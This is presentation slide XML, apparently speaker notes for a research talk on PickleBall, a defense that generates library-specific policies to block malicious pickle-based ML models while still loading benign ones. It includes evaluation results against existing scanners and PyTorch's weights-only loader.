        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="750" name="Google Shape;750;g3818d0781ce_0_8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51" name="Google Shape;751;g3818d0781ce_0_8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When PickleBall generates a loading policy for a library, the policy is meant to represent all the callables that </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>could appear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> in a pickle program that represents a valid model from the library.</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solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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6" name="Shape 756"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="757" name="Google Shape;757;g384641fc418_0_45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58" name="Google Shape;758;g384641fc418_0_45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rPr>
              <a:t>PickleBall statically analyzes the library model class definition to generate the policy.</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solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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7" name="Shape 767"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="768" name="Google Shape;768;g384641fc418_0_44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69" name="Google Shape;769;g384641fc418_0_44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For a high-level summary:</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PickleBall begins at the model class definition …</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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0" name="Shape 780"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="781" name="Google Shape;781;g36676170008_0_1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82" name="Google Shape;782;g36676170008_0_1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 and identifies what other class types are needed to instantiate a model object, based on its attribute types.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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3" name="Shape 793"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="794" name="Google Shape;794;g36676170008_0_13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95" name="Google Shape;795;g36676170008_0_1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It recursively visits those types, and applies rules based on a mapping of how pickle serializes python objects, accounting for methods with special semantics for pickle, like the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>reduce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>__ method. Its rules determine when a callable is allowed to just be imported and instantiated, or also invoked.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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6" name="Shape 806"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="807" name="Google Shape;807;g36676170008_0_14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08" name="Google Shape;808;g36676170008_0_14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solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFil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3" name="Shape 323"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Google Shape;324;g384641fc418_0_97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5" name="Google Shape;325;g384641fc418_0_97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Today, training models is expensive. The open model ecosystem lets us save money and time by letting us share and reuse pre-trained models from large model hubs, like Hugging Face.</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However, models from these hubs may come from untrusted sources. This lets attackers abuse this trust by creating malicious backdoored models and coercing users into loading them.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Backdoored models might be weights based, which compromise the inference of a model, or they can compromise the system that loads the models by executing arbitrary code.</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This work focuses on backdoors that compromise the system.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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1" name="Shape 821"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="822" name="Google Shape;822;g388d55caf50_0_16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23" name="Google Shape;823;g388d55caf50_0_16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Python is a dynamic language, which makes static analysis challenging. PickleBall’s policy generation is limited by some of these challenges, which it partially mitigates with its implementation.</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First, missing path information can result in missing types and incomplete policies. PickleBall mitigates this with a lazy policy enforcement, that allows model loading to continue when a missing callable remains unaccessed or uninvoked. This is helpful in the ML context, where PickleBall may miss type information that represents how the model was trained after it is instantiated. If the these callables are not used during loading or inference, PickleBall skips them and continues loading.</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To account for loose policies that result form over-approximate type recovery, PickleBall separates its policies into allowed imports and allowed invocations, and only adds callables to the allowed invocations when there is strong evidence that the callable needs to be invoked.</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For more detailed discussion of these limitations and mitigations, I invite you to read our paper.</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9" name="Shape 829"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="830" name="Google Shape;830;g388d55caf50_0_18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31" name="Google Shape;831;g388d55caf50_0_18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Python is a dynamic language, which makes static analysis challenging. PickleBall’s policy generation is limited by some of these challenges, which it partially mitigates with its implementation.</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First, missing path information can result in missing types and incomplete policies. PickleBall mitigates this with a lazy policy enforcement, that allows model loading to continue when a missing callable remains unaccessed or uninvoked. This is helpful in the ML context, where PickleBall may miss type information that represents how the model was trained after it is instantiated. If the these callables are not used during loading or inference, PickleBall skips them and continues loading.</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To account for loose policies that result form over-approximate type recovery, PickleBall separates its policies into allowed imports and allowed invocations, and only adds callables to the allowed invocations when there is strong evidence that the callable needs to be invoked.</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For more detailed discussion of these limitations and mitigations, I invite you to read our paper.</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7" name="Shape 837"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="838" name="Google Shape;838;g388d55caf50_0_19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39" name="Google Shape;839;g388d55caf50_0_19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Python is a dynamic language, which makes static analysis challenging. PickleBall’s policy generation is limited by some of these challenges, which it partially mitigates with its implementation.</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First, missing path information can result in missing types and incomplete policies. PickleBall mitigates this with a lazy policy enforcement, that allows model loading to continue when a missing callable remains unaccessed or uninvoked. This is helpful in the ML context, where PickleBall may miss type information that represents how the model was trained after it is instantiated. If the these callables are not used during loading or inference, PickleBall skips them and continues loading.</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To account for loose policies that result form over-approximate type recovery, PickleBall separates its policies into allowed imports and allowed invocations, and only adds callables to the allowed invocations when there is strong evidence that the callable needs to be invoked.</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For more detailed discussion of these limitations and mitigations, I invite you to read our paper.</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6" name="Shape 846"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="847" name="Google Shape;847;g388d55caf50_0_17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48" name="Google Shape;848;g388d55caf50_0_17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Python is a dynamic language, which makes static analysis challenging. PickleBall’s policy generation is limited by some of these challenges, which it partially mitigates with its implementation.</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First, missing path information can result in missing types and incomplete policies. PickleBall mitigates this with a lazy policy enforcement, that allows model loading to continue when a missing callable remains unaccessed or uninvoked. This is helpful in the ML context, where PickleBall may miss type information that represents how the model was trained after it is instantiated. If the these callables are not used during loading or inference, PickleBall skips them and continues loading.</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To account for loose policies that result form over-approximate type recovery, PickleBall separates its policies into allowed imports and allowed invocations, and only adds callables to the allowed invocations when there is strong evidence that the callable needs to be invoked.</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For more detailed discussion of these limitations and mitigations, I invite you to read our paper.</a:t>
            </a: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5" name="Shape 855"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="856" name="Google Shape;856;g388d55caf50_0_15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57" name="Google Shape;857;g388d55caf50_0_15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Python is a dynamic language, which makes static analysis challenging. PickleBall’s policy generation is limited by some of these challenges, which it partially mitigates with its implementation.</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First, missing path information can result in missing types and incomplete policies. PickleBall mitigates this with a lazy policy enforcement, that allows model loading to continue when a missing callable remains unaccessed or uninvoked. This is helpful in the ML context, where PickleBall may miss type information that represents how the model was trained after it is instantiated. If the these callables are not used during loading or inference, PickleBall skips them and continues loading.</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To account for loose policies that result form over-approximate type recovery, PickleBall separates its policies into allowed imports and allowed invocations, and only adds callables to the allowed invocations when there is strong evidence that the callable needs to be invoked.</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For more detailed discussion of these limitations and mitigations, I invite you to read our paper.</a:t>
            </a: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5" name="Shape 865"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="866" name="Google Shape;866;g3842e723c1f_0_8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67" name="Google Shape;867;g3842e723c1f_0_8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To evaluate PickleBall, we constructed a dataset of libraries and models.</a:t>
            </a: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1" name="Shape 871"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="872" name="Google Shape;872;g5c4979f16b5e051b_29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73" name="Google Shape;873;g5c4979f16b5e051b_29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To evaluate PickleBall, we constructed a dataset of libraries and models.</a:t>
            </a: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9" name="Shape 879"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="880" name="Google Shape;880;g5c4979f16b5e051b_28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81" name="Google Shape;881;g5c4979f16b5e051b_28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To evaluate PickleBall, we constructed a dataset of libraries and models.</a:t>
            </a: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1" name="Shape 891"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="892" name="Google Shape;892;g5c4979f16b5e051b_26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93" name="Google Shape;893;g5c4979f16b5e051b_26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To evaluate PickleBall, we needed a comprehensive dataset of libraries and models.</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We built a set of 16 libraries, which represent the APIs used to create pickle models and to load pickle models. We searched huggingface for popular pickle-based models and identified the library needed to load the model. Most of the libraries extend foundational libraries like pytorch and transformers. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- [Optional - decide]: We exclude these foundational libraries because they do not produce pickle models with abnormal imports and do not have insecure loading APIs.</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We created a set of 84 malicious pickle models and pickle programs. They represent all known techniques used by malicious models. It is collected from existing work that scanned all models on hugging face, and we check that its contents are representative of the models described in security reporting. We also supplemented it with two models with techniques that we found to bypass existing scanners, which we disclosed to the affected vendors.</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We created a set of 252 benign pickle models. They represent the models that should be loaded without inconveniencing users. We identified models associated with each of the 16 libraries by querying Hugging Face for the libraries and their loading APIs, and filter by number of downloads.</a:t>
            </a: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7" name="Shape 907"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="908" name="Google Shape;908;g5c4979f16b5e051b_15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09" name="Google Shape;909;g5c4979f16b5e051b_15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We compare PickleBall to state of the art tools that use diverse techniques.</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ProtectAI’s ModelScan is a scanner integrated into the Hugging Face platform today to analyze models when they are uploaded to the platform. It is representative of static analysis scanners.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ModelTracer is a dynamic scanner that traces the model during loading and analyzes the trace of system calls invoked during loading. It is the only application we know of that uses dynamic tracing to analyze models.</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The Weights-Only Unpickler is the default pickle loader in PyTorch, today.</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8" name="Shape 348"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="Google Shape;349;g388d55caf50_0_22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0" name="Google Shape;350;g388d55caf50_0_2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rPr>
              <a:t>Today, training models is expensive. The open model ecosystem lets us save money and time by letting us share and reuse pre-trained models from large model hubs, like Hugging Face.</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rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>However, models from these hubs may come from untrusted sources. This lets attackers abuse this trust by creating malicious backdoored models and coercing users into loading them. </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rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backdoored models might be weights based, which compromise the inference of a model, or they can compromise the system that loads the models by executing arbitrary code.</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rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This work focuses on backdoors that compromise the system.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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9" name="Shape 929"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="930" name="Google Shape;930;g5c4979f16b5e051b_38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31" name="Google Shape;931;g5c4979f16b5e051b_38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We compare PickleBall to state of the art tools that use diverse techniques.</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ProtectAI’s ModelScan is a scanner integrated into the Hugging Face platform today to analyze models when they are uploaded to the platform. It is representative of static analysis scanners.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ModelTracer is a dynamic scanner that traces the model during loading and analyzes the trace of system calls invoked during loading. It is the only application we know of that uses dynamic tracing to analyze models.</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The Weights-Only Unpickler is the default pickle loader in PyTorch, today.</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2" name="Shape 952"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="953" name="Google Shape;953;g5c4979f16b5e051b_36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54" name="Google Shape;954;g5c4979f16b5e051b_36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We compare PickleBall to state of the art tools that use diverse techniques.</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ProtectAI’s ModelScan is a scanner integrated into the Hugging Face platform today to analyze models when they are uploaded to the platform. It is representative of static analysis scanners.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ModelTracer is a dynamic scanner that traces the model during loading and analyzes the trace of system calls invoked during loading. It is the only application we know of that uses dynamic tracing to analyze models.</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The Weights-Only Unpickler is the default pickle loader in PyTorch, today.</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76" name="Shape 976"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="977" name="Google Shape;977;g5c4979f16b5e051b_34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78" name="Google Shape;978;g5c4979f16b5e051b_34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We compare PickleBall to state of the art tools that use diverse techniques.</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ProtectAI’s ModelScan is a scanner integrated into the Hugging Face platform today to analyze models when they are uploaded to the platform. It is representative of static analysis scanners.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ModelTracer is a dynamic scanner that traces the model during loading and analyzes the trace of system calls invoked during loading. It is the only application we know of that uses dynamic tracing to analyze models.</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The Weights-Only Unpickler is the default pickle loader in PyTorch, today.</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01" name="Shape 1001"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002" name="Google Shape;1002;g5c4979f16b5e051b_3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03" name="Google Shape;1003;g5c4979f16b5e051b_3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We compare PickleBall to state of the art tools that use diverse techniques.</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ProtectAI’s ModelScan is a scanner integrated into the Hugging Face platform today to analyze models when they are uploaded to the platform. It is representative of static analysis scanners.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ModelTracer is a dynamic scanner that traces the model during loading and analyzes the trace of system calls invoked during loading. It is the only application we know of that uses dynamic tracing to analyze models.</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The Weights-Only Unpickler is the default pickle loader in PyTorch, today.</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27" name="Shape 1027"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="Google Shape;1028;g5c4979f16b5e051b_7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29" name="Google Shape;1029;g5c4979f16b5e051b_7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We measured how well PickleBall blocks malicious models from loading.</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We find that it blocks ALL malicious models. This achieves our priority goal of security. The weights only unpickler also blocks all models, but scanners are bypassed by malicious models in our dataset.</a:t>
            </a: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38" name="Shape 1038"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1039" name="Google Shape;1039;g5c4979f16b5e051b_4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40" name="Google Shape;1040;g5c4979f16b5e051b_4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We measured how well PickleBall blocks malicious models from loading.</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We find that it blocks ALL malicious models. This achieves our priority goal of security. The weights only unpickler also blocks all models, but scanners are bypassed by malicious models in our dataset.</a:t>
            </a:r>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50" name="Shape 1050"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1051" name="Google Shape;1051;g5c4979f16b5e051b_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52" name="Google Shape;1052;g5c4979f16b5e051b_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Next, we measured how well PickleBall loads benign models.</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PickleBall’s library specific policies and lazy enforcement allow it to load 44 more models than the Weights Only Unpickler, giving improved usability for the same secure solution. The scanners load more of the benign models without raising false alarms, but at the cost of security.</a:t>
            </a:r>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61" name="Shape 1061"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1062" name="Google Shape;1062;g5c4979f16b5e051b_3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63" name="Google Shape;1063;g5c4979f16b5e051b_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Next, we measured how well PickleBall loads benign models.</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PickleBall’s library specific policies and lazy enforcement allow it to load 44 more models than the Weights Only Unpickler, giving improved usability for the same secure solution. The scanners load more of the benign models without raising false alarms, but at the cost of security.</a:t>
            </a:r>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73" name="Shape 1073"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1074" name="Google Shape;1074;g384641fc418_0_74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75" name="Google Shape;1075;g384641fc418_0_74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Finally, we evaluate PickleBall’s runtime performance.</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PickleBall generates all policies in under 30 seconds per library. This is a one-time cost per library, and once a policy is generated it can be reused to load models for that library.</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During model loading, PickleBall incurs a runtime overhead of less </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>than</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> 2%.</a:t>
            </a:r>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80" name="Shape 1080"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1081" name="Google Shape;1081;g5c4979f16b5e051b_5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82" name="Google Shape;1082;g5c4979f16b5e051b_5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Finally, we evaluate PickleBall’s runtime performance.</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PickleBall generates all policies in under 30 seconds per library. This is a one-time cost per library, and once a policy is generated it can be reused to load models for that library.</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During model loading, PickleBall incurs a runtime overhead of less than 2%.</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5" name="Shape 375"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Google Shape;376;g388d55caf50_0_19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7" name="Google Shape;377;g388d55caf50_0_19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rPr>
              <a:t>Today, training models is expensive. The open model ecosystem lets us save money and time by letting us share and reuse pre-trained models from large model hubs, like Hugging Face.</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rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>However, models from these hubs may come from untrusted sources. This lets attackers abuse this trust by creating malicious backdoored models and coercing users into loading them. </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rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backdoored models might be weights based, which compromise the inference of a model, or they can compromise the system that loads the models by executing arbitrary code.</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rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This work focuses on backdoors that compromise the system.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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90" name="Shape 1090"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1091" name="Google Shape;1091;g5c4979f16b5e051b_6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92" name="Google Shape;1092;g5c4979f16b5e051b_6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Finally, we evaluate PickleBall’s runtime performance.</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PickleBall generates all policies in under 30 seconds per library. This is a one-time cost per library, and once a policy is generated it can be reused to load models for that library.</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During model loading, PickleBall incurs a runtime overhead of less than 2%.</a:t>
            </a:r>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02" name="Shape 1102"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1103" name="Google Shape;1103;g3818d0781ce_0_7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04" name="Google Shape;1104;g3818d0781ce_0_7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In summary, today I’ve discussed how the pickle security threat is still prevalent in the model ecosystem, supported by our survey.</a:t>
            </a:r>
            <a:br>
